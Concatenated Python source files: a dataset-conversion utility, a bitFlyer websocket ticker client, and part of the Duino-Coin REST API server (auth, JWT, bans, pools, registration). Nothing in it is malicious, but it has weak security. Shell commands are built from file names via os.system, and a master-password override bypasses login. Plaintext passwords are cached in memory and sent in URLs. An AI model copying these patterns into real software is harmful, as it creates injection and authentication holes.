lines = lines.replace('/background', '/backgroundbmp')
for ext in formats:
lines = lines.replace(ext, '.bmp')
with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='data/coco_64img.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
realtime.py
|
from typing import Callable, Dict, Optional
import json
import time
import logging
from threading import Thread
import websocket
from websocket import WebSocketApp, WebSocketConnectionClosedException
from bitflyer.enumerations import ProductCode, Channel, PublicChannel
from bitflyer.responses import Ticker
logger = logging.getLogger(__name__)
class BitFlyerRealTime:
ENDPOINT = 'wss://ws.lightstream.bitflyer.com/json-rpc'
def __init__(self) -> None:
websocket.enableTrace(False)
self._ws_app = websocket.WebSocketApp(
self.ENDPOINT,
on_open=self._on_open,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close,
)
self._thread: Optional[Thread] = None
self._to_stop = True
self._message_handler_of: Dict[str, Callable] = {}
def stop(self) -> None:
self._to_stop = True
self._ws_app.close()
def start(self) -> None:
self._to_stop = False
logger.info('websocket server is now starting')
def run(ws: WebSocketApp) -> None:
while True:
if self._to_stop:
break
ws.run_forever(ping_interval=30, ping_timeout=10)
time.sleep(1)
t = Thread(target=run, args=(self._ws_app,))
t.start()
self._thread = t
logger.info('websocket server has started')
def is_alive(self) -> bool:
return self._thread is not None and self._thread.is_alive()
def subscribe(self, channel: Channel, product_code: ProductCode, handler: Callable) -> None:
channel_name = f'{channel.name}_{product_code.name}'
self._message_handler_of[channel_name] = handler
try:
self._subscribe(channel_name)
except WebSocketConnectionClosedException:
pass
def _subscribe(self, channel: str) -> None:
self._ws_app.send(json.dumps({
'method': 'subscribe',
'params': {'channel': channel},
}))
def _on_message(self, _: WebSocketApp, json_str: str) -> None:
msg = json.loads(json_str)
params = msg['params']
channel: str = params['channel']
message = params['message']
handler = self._message_handler_of[channel]
if channel.startswith(PublicChannel.lightning_ticker.name):
handler(Ticker.from_dict(message))
def _on_error(self, _: WebSocketApp, error) -> None:
logger.error(error)
def _on_close(self, _: WebSocketApp) -> None:
logger.info('connection closed')
def _on_open(self, _: WebSocketApp):
for c in self._message_handler_of.keys():
logger.info(f'`{c}` has been subscribed')
self._subscribe(c)
|
app.py
|
#!/usr/bin/env python3
"""
Duino-Coin REST API © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duco-rest-api
Duino-Coin Team & Community 2019-2021
"""
import gevent.monkey
gevent.monkey.patch_all()
from werkzeug.utils import secure_filename
import string
import secrets
from datetime import timedelta
from functools import reduce
from time import time
from dotenv import load_dotenv
import base64
import functools
from flask_caching import Cache
from flask import Flask, request, jsonify, render_template
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from flask_ipban import IpBan
from socket import socket
import json
import random
import requests
from bitcash import Key
from cashaddress import convert
from tronapi import Tron
from tronapi import HttpProvider
from nano_lib_rvx import Account
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import ssl
import smtplib
from colorama import Back, Fore, Style, init
from re import sub, match
from random import randint, choice
from time import sleep, time
from sqlite3 import connect as sqlconn
from bcrypt import hashpw, gensalt, checkpw
from json import load
import os
import traceback
import threading
from hashlib import sha1
from xxhash import xxh64
from fastrand import pcg32bounded as fastrandint
from Server import (
now, SAVE_TIME, POOL_DATABASE, CONFIG_WHITELIST_USR,
jail, global_last_block_hash, HOSTNAME,
DATABASE, DUCO_EMAIL, DUCO_PASS, alt_check, acc_check,
DB_TIMEOUT, CONFIG_MINERAPI, SERVER_VER,
CONFIG_TRANSACTIONS, API_JSON_URI, temporary_ban,
BCRYPT_ROUNDS, user_exists, SOCKET_TIMEOUT,
email_exists, send_registration_email, protocol_ban, protocol_loved_verified_mail,
DECIMALS, CONFIG_BANS, protocol_verified_mail, protocol_unverified_mail,
CONFIG_JAIL, CONFIG_WHITELIST, perm_ban,
NodeS_Overide, CAPTCHA_SECRET_KEY, CONFIG_BASE_DIR)
from validate_email import validate_email
from wrapped_duco_functions import *
import datetime
import jwt
html_recovery_template = """\
<html lang="en-US">
<head>
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Lato:wght@300&display=swap');
* {
font-family: 'Lato', sans-serif;
}
a:hover {
text-decoration: none !important;
}
.btn {
background: #ff9f43;
text-decoration: none !important;
font-weight: semibold;
border-radius: 16px;
margin-top: 35px;
color: #fff !important;
text-transform: uppercase;
font-size: 14px;
padding: 10px 24px;
display: inline-block;
}
.btn:hover {
background: #feca57;
}
</style>
</head>
<body marginheight="0" topmargin="0" marginwidth="0" style="margin: 0px; background-color: #fff8ee;" leftmargin="0">
<table cellspacing="0" border="0" cellpadding="0" width="100%" bgcolor="#fff8ee"">
<tr>
<td>
<table style=" background-color: #ffffff; max-width:670px; margin:0 auto;" width="100%" border="0"
align="center" cellpadding="0" cellspacing="0">
<tr>
<td style="height:80px;"> </td>
</tr>
<tr>
<td style="text-align:center;">
<a href="https://www.duinocoin.com" title="logo" target="_blank">
<img src="https://github.com/revoxhere/duino-coin/raw/master/Resources/ducobanner.png?raw=true"
width="50%" height="auto">
</a>
</td>
</tr>
<tr>
<td style="height:20px;"> </td>
</tr>
<tr>
<td>
<table width="95%" border="0" align="center" cellpadding="0" cellspacing="0"
style="max-width:670px;background:#fff; border-radius:3px; text-align:center; box-shadow: 0 4px 6px -1px rgb(0 0 0 / 0.1), 0 2px 4px -2px rgb(0 0 0 / 0.1);">
<tr>
<td style="text-align:center; padding-top: 25px; height:40px; font-size: 32px;">
Hey there, {username}!
</td>
</tr>
<tr>
<td style="padding:0 35px; text-align:center;">
<h1 style="color:#1e1e2d; font-weight:500; margin:0; margin-top: 25px; font-size:16px;">
You have requested to reset your private key</h1>
<span
style="display:inline-block; vertical-align:middle; margin:29px 0 26px; border-bottom:1px solid #cecece; width:100px;"></span>
<p style="color:#455056; font-size:15px;line-height:24px; margin:0;">
Because we don't store the private keys directly, we can't just send you your old key.<br>
<b>A unique link to reset your passphrase has been generated for you.</b><br>
To reset your private key, click the following link and follow the instructions.<br>
<b>You have 30 minutes to reset your key.</b><br>
If you did not request a passphrase reset, please ignore this email.
</p>
<a href="{link}" class="btn">
Reset passphrase
</a>
</td>
</tr>
<tr>
<td style="height:40px;"> </td>
</tr>
</table>
</td>
<tr>
<td style="height:20px;"> </td>
</tr>
<tr>
<td style="text-align:center;">
<p style="font-size:14px; color:rgba(69, 80, 86, 0.7411764705882353); line-height:18px; margin:0 0 0;">
Have a great day, <a href="https://duinocoin.com/team">the Duino-Coin Team</a> 😊</p>
</td>
</tr>
<tr>
<td style="height:80px;"> </td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
"""
def forwarded_ip_check():
return request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
def dbg(*message):
if "TX" in str(message):
fg_color = Fore.YELLOW
elif "EX" in str(message):
fg_color = Fore.CYAN
elif "Error" in str(message):
fg_color = Fore.RED
elif "Success" in str(message):
fg_color = Fore.GREEN
else:
fg_color = Fore.WHITE
print(now().strftime(
Style.RESET_ALL
+ Style.DIM
+ Fore.WHITE
+ "%H:%M:%S")
+ Style.BRIGHT
+ fg_color,
*message,
Style.RESET_ALL)
# Exchange settings
exchange_address = {
"duco": "coinexchange",
"xmg": "95JLhkyWVDce5D17LyApULc5YC4vrVzaio",
"lke": "Like3yYC34YQJRMQCSbTDWKLhnzCoZvo9AwWuu5kooh",
"bch": "bitcoincash:qpgpd7slludx5h9p53qwf8pxu9z702n95qteeyzay3",
"trx": "TQUowTaHwvkWHbNVkxkAbcnbYyhF4or1Qy",
# "xrp": "rGT84ryubURwFMmiJChRbWUg9iQY18VGuQ (Destination tag: 2039609160)",
# "dgb": "DHMV4BNGpWbdhpq6Za3ArncuhpmtCjyQXg",
"nano": "nano_3fpqpbcgt3nga3s81td6bk7zcqdr7ockgnyjkcy1s8nfn98df6c5wu14fuuq",
# "rvn": "RH4bTDaHH7LSSCVSvXJzJ5KkiGR1QRMaqN",
# "nim": "NQ88 Q9ME 470X 8KY8 HXQG J96N 6FHR 8G0B EDMH"
}
fees = {
"duco": 0,
"xmg": 0.05,
"lke": 0,
"bch": 0.0000023,
"trx": 1,
"nano": 0
}
load_dotenv()
IPDB_KEY = os.getenv('IPDB_KEY')
PROXYCHECK_KEY = os.getenv('PROXYCHECK_KEY')
TRX_SECRET_KEY = os.getenv('TRX_SECRET_KEY')
BCH_SECRET_KEY = os.getenv('BCH_SECRET_KEY')
LIKECOIN_SECRET_KEY = os.getenv('LIKECOIN_SECRET_KEY')
NANO_SECRET_KEY = os.getenv('NANO_SECRET_KEY')
EXCHANGE_MAIL = DUCO_EMAIL
SERVER_NAME = "duino-master-1"
IP_CHECK_DISABLED = True
XXHASH_TX_PROB = 30
POOL_SYNC_TIME = 15
chain_accounts = ["bscDUCO", "celoDUCO", "maticDUCO"]
overrides = [
NodeS_Overide,
DUCO_PASS
]
config = {
"DEBUG": False,
"CACHE_TYPE": "RedisCache",
"CACHE_REDIS_URL": "redis://localhost:6379/0",
"CACHE_DEFAULT_TIMEOUT": SAVE_TIME,
"SECRET_KEY": DUCO_PASS,
"JSONIFY_PRETTYPRINT_REGULAR": False}
limiter = Limiter(
key_func=forwarded_ip_check,
default_limits=["5000 per day", "5 per 1 second"])
ip_ban = IpBan(
ban_seconds=60*60,
ban_count=10,
persist=False,
ip_header='HTTP_X_REAL_IP',
record_dir="config/ipbans/",
ipc=True,
secret_key=DUCO_PASS)
app = Flask(__name__, template_folder='config/error_pages')
app.config.from_mapping(config)
cache = Cache(app)
limiter.init_app(app)
ip_ban.init_app(app)
requests_session = requests.Session()
thread_lock = threading.Lock()
nano_key = Account(priv_key=NANO_SECRET_KEY)
bch_key = Key(BCH_SECRET_KEY)
trx_key = Tron(
full_node=HttpProvider('https://api.trongrid.io'),
solidity_node=HttpProvider('https://api.trongrid.io'),
event_server=HttpProvider('https://api.trongrid.io'))
trx_key.private_key = TRX_SECRET_KEY
trx_key.default_address = exchange_address["trx"]
network = {
"name": "Duino-Coin",
"color": 'e67e22',
"avatar": 'https://github.com/revoxhere/duino-coin/raw/master/Resources/duco.png?raw=true',
}
last_transactions_update, last_miners_update, last_balances_update = 0, 0, 0
miners, balances, transactions = [], [], []
rate_count, last_transfer, checked_ips = {}, {}, {}
banlist, jailedusr, registrations, whitelisted_usr = [], [], [], []
registration_db = {}
with open('config/emails/sell_manual_email.html', 'r') as file:
html_exc = file.read()
with open('config/emails/sell_email.html', 'r') as file:
html_auto = file.read()
with open('config/emails/buy_email.html', 'r') as file:
html_buy = file.read()
with open('config/emails/sell_error.html', 'r') as file:
html_error = file.read()
def fetch_bans():
global jail, banlist, whitelisted_usr, whitelist
jail, banlist, whitelisted_usr, whitelist = [], [], [], []
while True:
with open(CONFIG_JAIL, "r") as jailedfile:
jailedusr = jailedfile.read().splitlines()
for username in jailedusr:
jail.append(username.strip())
with open(CONFIG_BANS, "r") as bannedusrfile:
bannedusr = bannedusrfile.read().splitlines()
for username in bannedusr:
banlist.append(username.strip())
with open(CONFIG_WHITELIST_USR, "r") as whitelistedusrfile:
whitelist = whitelistedusrfile.read().splitlines()
for username in whitelist:
whitelisted_usr.append(username.strip())
with open(CONFIG_WHITELIST, "r") as whitelistfile:
whitelist = whitelistfile.read().splitlines()
for ip in whitelist:
ip_ban.ip_whitelist_add(ip.strip())
dbg("Loaded bans and whitelist")
sleep(30)
jail, banlist, whitelisted_usr, whitelist = [], [], [], []
with open(CONFIG_JAIL, "r") as jailedfile:
jailedusr = jailedfile.read().splitlines()
for username in jailedusr:
jail.append(username.strip())
with open(CONFIG_BANS, "r") as bannedusrfile:
bannedusr = bannedusrfile.read().splitlines()
for username in bannedusr:
banlist.append(username.strip())
with open(CONFIG_WHITELIST_USR, "r") as whitelistedusrfile:
whitelist = whitelistedusrfile.read().splitlines()
for username in whitelist:
whitelisted_usr.append(username.strip())
with open(CONFIG_WHITELIST, "r") as whitelistfile:
whitelist = whitelistfile.read().splitlines()
for ip in whitelist:
ip_ban.ip_whitelist_add(ip.strip())
dbg("Loaded bans and whitelist")
# threading.Thread(target=fetch_bans).start()
def clear_obs():
global observations
while True:
observations = {}
dbg("Cleared observations")
sleep(15*60)
# threading.Thread(target=clear_obs).start()
def likecoin_transaction(recipient: str, amount: int, comment: str):
data = {
"address": str(recipient),
"amount": str(int(amount) * 1000000000),
"comment": str(comment),
"prv": LIKECOIN_SECRET_KEY}
r = requests.post(
"https://wallet.likecoin.pro/api/v0/new-transfer",
data=data).json()
if "error" in r:
raise Exception(r["error"])
else:
return r["hash"]
observations = {}
@app.errorhandler(429)
def error429(e):
global observations
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
# if not ip_addr in whitelist:
#dbg("Too many observations", ip_addr)
# ip_addr_ban(ip_addr)
# ip_ban.block(ip_addr)
return render_template('403.html'), 403
else:
limit_err = str(e).replace("429 Too Many Requests: ", "")
#dbg("Error 429", ip_addr, limit_err, os.getpid())
return render_template('429.html', limit=limit_err), 429
@app.errorhandler(404)
def error404(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
page_name = str(request.url)
ip_ban.add(ip=ip_addr)
if "php" in page_name:
print("serio xD")
return "we're not even using php you dumb fuck"
elif "eval" in page_name:
print("serio 2 xD")
return "debil XD"
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
# if not ip_addr in whitelist:
#dbg("Too many observations", ip_addr)
# ip_addr_ban(ip_addr)
# ip_ban.block(ip_addr)
return render_template('403.html'), 403
else:
if "auth" in page_name:
return _success("OK")
dbg("Error 404", ip_addr, page_name)
return render_template('404.html', page_name=page_name), 404
@app.errorhandler(500)
def error500(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
dbg("Error 500", ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
# if not ip_addr in whitelist:
#dbg("Too many observations - banning", ip_addr)
# ip_addr_ban(ip_addr)
# ip_ban.block(ip_addr)
return render_template('403.html'), 403
else:
return render_template('500.html'), 500
@app.errorhandler(403)
def error403(e):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
ip_ban.block(ip_addr)
dbg("Error 403", ip_addr)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
if not ip_addr in whitelist:
dbg("Too many observations - banning", ip_addr)
ip_addr_ban(ip_addr)
# ip_ban.block(ip_addr)
return render_template('403.html'), 403
cached_logins = {}
def login(username: str, unhashed_pass: str):
global cached_logins
try:
try:
data = jwt.decode(unhashed_pass, app.config['SECRET_KEY'], algorithms=['HS256'])
except jwt.ExpiredSignatureError:
return (False, 'Token expired. Please log in again.')
except jwt.DecodeError: # if the token is invalid
if not match(r"^[A-Za-z0-9_-]*$", username):
return (False, "Incorrect username")
if username in cached_logins:
if unhashed_pass == cached_logins[username]:
return (True, "Logged in")
else:
return (False, "Invalid password")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
data = datab.fetchone()
if len(data) > 1:
stored_password = data[1]
else:
return (False, "No user found")
try:
if checkpw(unhashed_pass, stored_password):
cached_logins[username] = unhashed_pass
return (True, "Logged in")
return (False, "Invalid password")
except Exception:
if checkpw(unhashed_pass, stored_password.encode('utf-8')):
cached_logins[username] = unhashed_pass
return (True, "Logged in")
return (False, "Invalid password")
except Exception as e:
return (False, "DB Err: " + str(e))
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
email = datab.fetchone()[2]
if data['email'] == email:
return (True, "Logged in")
except Exception as e:
return (False, "DB Err:" + str(e))
except Exception as e:
print(e)
def check_ip(ip):
global checked_ips
global IP_CHECK_DISABLED
try:
if IP_CHECK_DISABLED:
return (False, None)
elif not ip:
return (True, "Your IP address is hidden")
elif ip in whitelist:
return (False, None)
elif ip in checked_ips:
return checked_ips[ip]
try:
response = requests_session.get(
f"http://proxycheck.io/v2/{ip}"
+ f"?key={PROXYCHECK_KEY}&vpn=1&proxy=1").json()
if "proxy" in response[ip]:
if response[ip]["proxy"] == "yes":
dbg("Proxy detected: " + str(ip))
checked_ips[ip] = (True, "You're using a proxy")
# threading.Thread(target=ip_addr_ban, args=[ip, True]).start()
return checked_ips[ip]
if "vpn" in response[ip]:
if response[ip]["vpn"] == "yes":
dbg("VPN detected: " + str(ip))
checked_ips[ip] = (True, "You're using a VPN")
# threading.Thread(target=ip_addr_ban, args=[ip, True]).start()
return checked_ips[ip]
except:
IP_CHECK_DISABLED = True
else:
checked_ips[ip] = (False, None)
return (False, None)
except Exception as e:
return (False, None)
def ip_addr_ban(ip, perm=False):
if not ip in whitelist:
ip_ban.block(ip)
if perm:
perm_ban(ip)
else:
temporary_ban(ip)
def _success(result, code=200):
response = jsonify(result=result, success=True, server=SERVER_NAME)
response.headers.add('Access-Control-Allow-Origin', '*')
return response, code
def _error(result, code=200):
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_ban.add(ip=ip_addr)
print(result)
try:
observations[ip_addr] += 1
except:
observations[ip_addr] = 1
if observations[ip_addr] > 30:
if not ip_addr in whitelist:
dbg("Too many observations - banning", ip_addr)
ip_addr_ban(ip_addr)
ip_ban.block(ip_addr)
sleep(observations[ip_addr])
return render_template('403.html'), 403
else:
response = jsonify(message=result, success=False, server=SERVER_NAME)
response.headers.add('Access-Control-Allow-Origin', '*')
return response, code
def _proxy():
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
threading.Thread(target=ip_addr_ban, args=[ip_addr, True]).start()
return _error("You're using a proxy or VPN")
def get_all_transactions():
global transactions
global last_transactions_update
if time() - last_transactions_update > SAVE_TIME:
# print(f'fetching transactions from {CONFIG_TRANSACTIONS}')
try:
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Transactions")
rows = datab.fetchall()
transactions = {}
for row in rows:
transactions[row[4]] = row_to_transaction(row)
last_transactions_update = time()
except Exception as e:
print(traceback.format_exc())
return transactions
def row_to_transaction(row):
return {
'datetime': str(row[0]),
'sender': str(row[1]),
'recipient': str(row[2]),
'amount': float(row[3]),
'hash': str(row[4]),
'memo': str(sub(r"[^A-Za-z0-9 .-:!#_+-]+", ' ', str(row[5]))),
'id': int(row[6])
}
def get_transactions(username: str, limit=10, reverse=True):
try:
order = "DESC"
if reverse:
order = "ASC"
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT * FROM (
SELECT * FROM Transactions
WHERE username = ?
OR recipient = ?
ORDER BY id DESC
LIMIT ?
) ORDER BY id """ + order,
(username, username, limit))
rows = datab.fetchall()
return [row_to_transaction(row) for row in rows]
except Exception as e:
return str(e)
def get_all_miners():
global last_miners_update
global miners
if time() - last_miners_update > SAVE_TIME:
try:
# print(f'fetching miners from {CONFIG_MINERAPI}')
with sqlconn(CONFIG_MINERAPI, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Miners")
rows = datab.fetchall()
last_miners_update = time()
miners = {}
for row in rows:
if not row[1] in miners:
miners[row[1]] = []
miners[row[1]].append(row_to_miner(row))
except Exception as e:
pass
return miners
def row_to_miner(row):
return {
"threadid": str(row[0]),
"username": str(row[1]),
"hashrate": float(row[2]),
"sharetime": float(row[3]),
"accepted": int(row[4]),
"rejected": int(row[5]),
"diff": int(row[6]),
"software": str(row[7]),
"identifier": str(row[8]),
"algorithm": str(row[9]),
"pool": str(row[10]),
"wd": row[11],
"ki": int(row[13])
}
def get_miners(username: str):
with sqlconn(CONFIG_MINERAPI, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Miners WHERE username = ?", (username, ))
rows = datab.fetchall()
if len(rows) < 1:
raise Exception("No miners detected")
rows.sort(key=lambda tup: tup[1])
return [row_to_miner(row) for row in rows]
trusted = {}
creation = {}
def get_all_balances():
global balances
global last_balances_update
global balances
global trusted
global creation
if time() - last_balances_update > 30:
try:
# print(f'fetching balances from {DATABASE}')
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM Users")
rows = datab.fetchall()
balances = {}
trusted = {}
for row in rows:
balances[row[0]] = row[3]
creation[row[0]] = row[4].lower()
trusted[row[0]] = row[5].lower()
last_balances_update = time()
except Exception as e:
print(traceback.format_exc())
return balances
def get_user_data(username: str):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
row = datab.fetchone()
if not row:
raise Exception(f"{username} not found")
return {
"username": username,
"balance": round(row[3], DECIMALS),
"verified": row[5].lower(),
"created": row[4].lower()
}
def is_verified(username: str):
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
row = datab.fetchone()
if len(row) < 1:
return "no"
return row[5].lower()
except:
return "no"
@app.route("/ping")
@cache.cached(timeout=60)
def ping():
return _success("Pong!")
@app.route("/404")
@cache.cached(timeout=60)
def test404():
dbg("Error 404 test")
return render_template('404.html'), 404
@app.route("/429")
@cache.cached(timeout=60)
def test429():
dbg("Error 429 test")
return render_template('429.html'), 429
@app.route("/403")
@cache.cached(timeout=60)
def test403():
dbg("Error 403 test")
return render_template('403.html'), 403
@app.route("/500")
@cache.cached(timeout=60)
def test500():
dbg("Error 500 test")
return render_template('500.html'), 500
@app.route("/all_pools")
@cache.cached(timeout=SAVE_TIME)
def all_pools():
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
try:
with sqlconn(POOL_DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("SELECT * FROM PoolList")
data = datab.fetchall()
pools = []
for row in data:
if row[4] == "True":
if row[10]:
lastsync = int(time()) - int(row[10])
if lastsync == 0:
lastsync = "now"
else:
lastsync = f"{lastsync}s ago"
else:
lastsync = "unknown"
pool = {
"name": str(row[1]),
"cpu": int(row[6]),
"ram": int(row[7]),
"connections": int(row[8]),
"icon": str(row[9]),
"lastsync": str(lastsync)}
pools.append(pool)
return _success(pools)
except Exception as e:
return _error(str(e))
@cache.cached(timeout=5)
def poolfetchdb():
try:
def lowest_load(curr, prev):
if (prev[4]*2 + prev[5]) < (curr[4]*2 + curr[5]):
return prev
return curr
with sqlconn(POOL_DATABASE) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT name, ip, port, Status, ram,
cpu, connections, lastsync
FROM PoolList
WHERE hidden != 'True'""")
rows = datab.fetchall()
pool_list = []
for pool in rows:
lastsync = time() - pool[-1]
if pool[3] == "True" and pool[5] < 95 and pool[4] < 95 and lastsync < 120:
pool_list.append(pool)
if len(pool_list) < 1:
pool_list = []
for pool in rows:
lastsync = time() - pool[-1]
if lastsync < 600:
pool_list.append(pool)
best_pool = reduce(lowest_load, pool_list)
to_return = {
"name": str(best_pool[0]),
"ip": str(best_pool[1]),
"port": int(best_pool[2]),
"server": str(SERVER_NAME),
"success": True
}
return to_return
except Exception as e:
return _error(str(e))
@app.route("/getPool")
def getpool():
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
return poolfetchdb()
@app.route("/auth/<username>")
@limiter.limit("6 per 1 minute")
def api_auth(username=None):
global registration_db
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass = request.args.get('password', None).encode('utf-8')
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username) or not username:
return _error(f"This user doesn't exist (auth): {username}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
# dbg("/GET/auth", username, unhashed_pass.decode())
try:
if unhashed_pass.decode() in overrides:
return _success("Logged in")
if username in banlist:
ip_addr_ban(ip_addr, True)
return _error("User banned")
login_protocol = login(username, unhashed_pass)
if login_protocol[0] == True:
threading.Thread(target=alt_check, args=[
ip_addr, username]).start()
return _success(login_protocol[1])
else:
return _error(login_protocol[1])
except:
return _error("Invalid password")
@app.route("/v2/auth/check/<username>")
@limiter.limit("6 per 1 minute")
def api_auth_check(username=None):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
token = request.args.get('token', None)
except Exception as e:
return _error(f"Invalid data: {e}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
try:
try:
data = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
except jwt.ExpiredSignatureError:
return _error('Signature expired. Please log in again.')
except jwt.InvalidTokenError:
return _error('Invalid token. Please log in again.')
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
email = datab.fetchone()[2]
if data['email'] == email:
return _success(["Logged in", email])
except Exception as e:
print(traceback.format_exc())
return _error('Auth token is invalid')
except Exception as e:
print(traceback.format_exc())
return _error('Auth token is invalid')
@app.route("/v2/auth/<username>")
@limiter.limit("6 per 1 minute")
def new_api_auth(username=None):
try:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
unhashed_pass_b64 = request.args.get('password', None)
except Exception as e:
return _error(f"Invalid data: {e}")
if unhashed_pass_b64:
unhashed_pass_b64 = str(unhashed_pass_b64).encode('utf-8')
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
try:
if username in banlist:
ip_addr_ban(ip_addr, True)
return _error("User banned")
try:
unhashed_pass = base64.b64decode(unhashed_pass_b64)
except Exception as e:
return _error(f"Decoding error")
# dbg("/GET/auth", username, unhashed_pass.decode())
if not unhashed_pass:
return _error("Provide a password")
if not user_exists(username) or not username:
return _error(f"This user doesn't exist (auth 2): {username}")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Users
WHERE username = ?""",
(username, ))
email = datab.fetchone()[2]
except:
email = "unknown"
if unhashed_pass.decode() in overrides:
return _success(["Logged in (override)", email])
login_protocol = login(username, unhashed_pass)
if login_protocol[0] == True:
threading.Thread(target=alt_check, args=[ip_addr, username]).start()
token = jwt.encode({'email': email, 'exp' : datetime.datetime.utcnow() + datetime.timedelta(minutes=60)}, app.config['SECRET_KEY'], algorithm='HS256')
return _success([login_protocol[1], email, token])
else:
return _error(login_protocol[1])
except Exception as e:
print(traceback.format_exc())
return _error("Invalid password")
@app.route("/v2/users/<username>")
@app.route("/v3/users/<username>")
@cache.cached(timeout=SAVE_TIME)
def new_api_get_user_objects(username: str):
try:
try:
limit = int(request.args.get('limit', None))
except:
limit = 5
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
if username in banlist:
return _error("User banned")
try:
balance = get_user_data(username)
except Exception as e:
return _error(f"This user doesn't exist (users): {e}")
try:
miners = get_miners(username)
except Exception as e:
miners = []
try:
transactions = get_transactions(username, limit)
except Exception as e:
transactions = []
try:
with open("config/prices.json", 'r') as f:
duco_prices = load(f)
except:
duco_prices = {}
result = {
'balance': balance,
'miners': miners,
'transactions': transactions,
'prices': duco_prices
}
return _success(result)
@app.route("/register/")
@limiter.limit("5 per hour")
def register():
global registrations
try:
username = request.args.get('username', None)
unhashed_pass = request.args.get('password', None)
email = request.args.get('email', None)
captcha = request.args.get('captcha', None)
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
postdata = {'secret': CAPTCHA_SECRET_KEY,
'response': captcha}
except Exception as e:
return _error(f"Invalid data: {e}")
if not username:
return _error("No username provided")
if unhashed_pass:
unhashed_pass = str(unhashed_pass).encode('utf-8')
else:
return _error("No password provided")
if not email:
return _error("No e-mail provided")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
#altcheck = alt_check(ip_addr, username)
# if altcheck[0]:
# return _error(
# f"You are already registered as {altcheck[1]}, why do you need another account?")
try:
captcha_data = requests.post(
'https://hcaptcha.com/siteverify', data=postdata).json()
